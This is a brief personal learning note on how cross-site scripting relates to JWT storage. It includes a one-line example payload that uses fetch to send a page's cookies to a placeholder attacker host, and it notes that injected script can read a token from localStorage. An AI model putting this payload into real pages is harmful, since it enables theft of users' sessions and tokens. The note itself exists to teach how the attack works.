what’s the connection between JWT and XSS

tags: learning networking

content

XSS: cross site scripting
- attackers inject javascript to a webpage to do malicious stuff
below is a way to steal cookies

<script>fetch('https://evil.com?cookie=' + document.cookie)</script>

if JWT is stored in localStorage, then a malicious script can obtain JWT by localStorage.getItem("access_token")

up

JWT

down

reference